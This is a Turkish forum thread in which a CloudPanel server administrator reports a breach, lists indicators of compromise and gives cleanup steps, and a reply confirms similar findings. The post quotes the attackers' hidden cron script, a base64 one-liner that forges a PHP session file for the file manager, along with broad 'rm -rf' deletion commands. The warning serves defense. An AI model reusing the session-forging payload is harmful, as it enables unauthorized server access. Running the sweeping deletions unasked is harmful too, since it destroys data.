• 25-12-2024, 02:44:59
    #1
    Merhabalar,

    Şans eseri kendi sunucumda sızıntı farkedip tüm önlemleri ve sunucuyu baştan aşağı komple elden geçirip düzelttiğim ve saatlerimi alan bir güvenlik açığı eğer son update kullanmayan arkadaşlar var ise aşağıdaki resimdeki önlemleri almasını tavsiye ederim ayrıca sızıntı olan arkadaşlarında sunucularında bir takım işlemler ile güvenliği sağlaması gerekmektedir.





    1. Aşağıdaki dizinde dosya içerisinde bilginiz dahilinde olmayan kullanıcıları kontrol edin.
    /etc/passwd
    richard33:x:1017:1017::/home/richard33:/bin/bash
    2. Aşağıdaki dizinde benzer dosya mevcutmu analiz edin.
    //tmp/.cron-job.sh
    echo X3NmMl9hdHRyaWJ1dGVzfGE6MTp7czoxNjoiY2xwLWZpbGUtbWFuYWdlciI7YToyOntzOjQ6InVzZXIiO3M6MzoiY2xwIjtzOjY6ImxvY2FsZSI7czowOiIiO319|base64 -d > /var/lib/php/sessions/sess_hZYeoR84EXEGEEO9Zfw4CHnTQ8
    Yukarıdaki 2 işlemi kontrol ederek herhangi bir sızıntı tespit ederseniz hızlıca almanız gereken aksiyonları sıralıyorum.

    1. Cloudpanel Update (v2.5.0)
    clp-update
    2. Sunucu root şifresi değişin
    sudo passwd root
    3. etc/passwd bilginiz dahilinde olmayan kullanıcıları silin.
    sudo userdel richard33
    sudo rm -rf /home/richard33
    4. Rootkit Malware tespit ederseniz temizleyin.
    sudo rm -f /tmp/.cron-job.sh
    sudo rm -f /var/lib/php/sessions/sess_hZYeoR84EXEGEEO9Zfw4CHnTQ8
    veya
    sudo rm -rf /tmp/*
    sudo rm -rf /var/tmp/*
    sudo rm -rf /var/lib/php/sessions/*
    5. Cloudpanel Admin Area'da Users Listelerinde Oluşmuş bir kullanıcı varsa silin (Root kullanıcısı orada listelenmez.)

    6. Cloudpanel Yönetici Şifre değişimi
    clpctl user:reset:password --userName=john.doe --password='!newPassword!'
    7. Ekstra güvenlik için Basic Auth Özelliğini Aktifleştirin.


    Not: Ben bu size söylediğim işlemlerden çok daha fazla analiz ve kontrol gerçekleştirdim. Tüm Cronjob listeleri Network-port listesi arkakapı kontrolleri (sh-py-pl) scriptleri tarih bazlı tarama gibi 3th party malware clean paketleri ve daha birçok kontrol gerçekleştirdim. Sızıntı farkederseniz sizinde detaylı bir kontrol yapmanızı tavsiye ederim yapamazsanızda yukardaki önerilerimi yapmanızda kısmi güvenliği sağlayacaktır. Sanıyorum bu sızıntılar otomatik yüzlerce kişiye eşzamanlı gerçekleşen bir attack manuel bir sızıntı ile shell yada arkakapı oluşturulması yapılmamış hiç olmazsa ben bulamadım bulabilen olursa konu altında bilgi verirse herkes faydalanabilir.

    Ayrıca 1-2 tane sitesi olanlar için tavsiyem sunucuyu komple sıfırlayıp güncel sürüm cloudpanel kurup siteleri yeniden kurması olacaktır. Site sayısı az ise eğer.
  • 25-12-2024, 03:41:14
    #2
    Teşekkürler bilgilendirme için. Evet internete açık olan sistemim üzerinde 2 kullanıcı tespit ettim ve cron dosyaları vs. oluşturulmuştu. Intranet içerisinde çalışan reverse proxy için kullanıdığım sistemde bir sorun yok...